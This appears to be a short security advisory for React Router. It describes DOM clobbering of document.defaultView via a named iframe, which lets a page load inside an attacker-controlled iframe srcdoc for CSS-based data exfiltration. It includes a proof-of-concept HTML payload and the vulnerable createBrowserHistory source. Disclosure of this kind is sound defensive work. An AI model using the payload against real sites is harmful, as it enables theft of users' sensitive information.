React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. You can use it maximally as a React framework or minimally as a library with your own architecture.
Based on how React Router handles routes with createBrowserRouter, it is possible to clobber the document.defaultView value with an iframe and reload the application. This allows a page to be loaded within a user-controlled <iframe srcdoc>. As a result, it may be possible to exfiltrate sensitive information using CSS.
<iframe srcdoc="
<!DOCTYPE html>
<html>
<head>
<style>
/* CSS Injection HERE */
</style>
<script type='module' crossorigin src='/assets/index.7352e15a.js'></script>
</head>
<body>
<iframe name='defaultView' src='/home'></iframe>
<div id='root'></div>
</body>
</html>
" style='width:50vw; height: 50vh'></iframe>More Info
export function createBrowserHistory(
options: BrowserHistoryOptions = {}
): BrowserHistory {
let { window = document.defaultView! } = options;
let globalHistory = window.history;
function getIndexAndLocation(): [number, Location] {
let { pathname, search, hash } = window.location;
let state = globalHistory.state || {};
return [
state.idx,
readOnly<Location>({
pathname,
search,
hash,
state: state.usr || null,
key: state.key || "default",
}),
];
}
Related links:
Found by @Strellic_.